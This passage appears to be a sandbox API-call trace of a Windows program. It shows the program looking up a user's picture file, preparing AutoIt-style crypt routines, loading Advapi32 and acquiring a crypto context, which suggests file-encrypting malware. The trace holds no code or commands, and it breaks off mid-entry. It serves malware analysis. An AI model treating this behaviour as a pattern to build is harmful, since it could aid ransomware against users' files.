[0189.957] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.957] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\QS5wBgJkU5.bmp", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x525098e0, ftCreationTime.dwHighDateTime=0x1d5dd7a, ftLastAccessTime.dwLowDateTime=0xf1e50b30, ftLastAccessTime.dwHighDateTime=0x1d5df13, ftLastWriteTime.dwLowDateTime=0xf1e50b30, ftLastWriteTime.dwHighDateTime=0x1d5df13, nFileSizeHigh=0x0, nFileSizeLow=0x176ff, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="QS5wBgJkU5.bmp", cAlternateFileName="QS5WBG~1.BMP")) returned 0x90af58 [0189.958] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0189.958] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.958] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0189.958] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.958] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0189.958] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0189.958] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.958] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0189.959] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.959] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.959] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0189.959] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0189.959] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0189.959] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.959] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.959] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0189.959] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0189.959] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0189.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0189.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0189.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0189.960] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c88) returned 1 [0189.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0189.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0189.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0189.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0189.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0189.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0189.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0189.961] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0189.961] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0189.961] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0189.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0189.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0189.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0189.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0189.962] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0189.962] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0189.962] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0189.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0189.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0189.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0189.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0189.962] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0189.962] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0189.962] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0189.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0189.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0189.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0189.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0189.962] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0189.962] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0189.962] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0189.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0189.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0189.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0189.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0189.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0189.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0189.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0189.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0189.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0189.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0189.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0189.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0189.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0189.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0189.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0189.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0189.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0189.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0189.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0189.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0189.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0189.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0189.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0189.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0189.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0189.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0189.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0189.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0189.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0189.964] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0189.964] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0189.964] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0189.964] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0189.964] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0189.964] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0189.964] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0189.964] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0189.964] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0189.964] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0189.964] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0189.964] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0189.964] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0189.964] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0189.964] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0189.964] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.964] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0189.964] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0189.964] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0189.964] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0189.964] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0189.964] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0189.964] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0189.964] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d4a0 [0189.964] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0189.964] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0189.964] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0189.964] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0189.964] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0189.964] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0189.964] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae58 [0189.965] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0189.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0189.965] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0189.965] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.965] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0189.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0189.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c27d8 [0189.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0189.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0189.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0189.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0189.965] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0189.965] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0189.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd600 [0189.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0189.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0189.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0189.965] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0189.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0189.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0189.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0189.965] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0189.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0189.965] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0189.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0189.965] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0189.966] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0189.966] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0189.966] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0189.966] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0189.966] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0189.966] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0189.966] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0189.966] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0189.966] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0189.966] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0189.966] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0189.966] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0189.966] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0189.966] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.966] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae58 | out: hHeap=0x8a0000) returned 1 [0189.966] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.966] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0189.966] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.966] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0189.966] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0189.966] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0189.966] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.966] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0189.966] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bdab0 [0189.966] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0189.966] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0189.966] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0189.966] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0189.966] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0189.967] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0189.967] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0189.967] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0189.967] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0189.967] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0189.967] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0189.967] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.967] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0189.967] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0189.967] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0189.967] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0189.967] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0189.967] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0189.967] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0189.967] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0189.967] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0189.967] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0189.967] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0189.967] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0189.967] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0189.967] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0189.967] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0189.967] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0189.967] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0189.967] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0189.967] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0189.967] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0189.967] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0189.967] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0189.967] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0189.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0189.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0189.968] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.968] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0189.968] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.968] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0189.968] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0189.968] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0189.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0189.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0189.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0189.968] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae58 [0189.968] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, 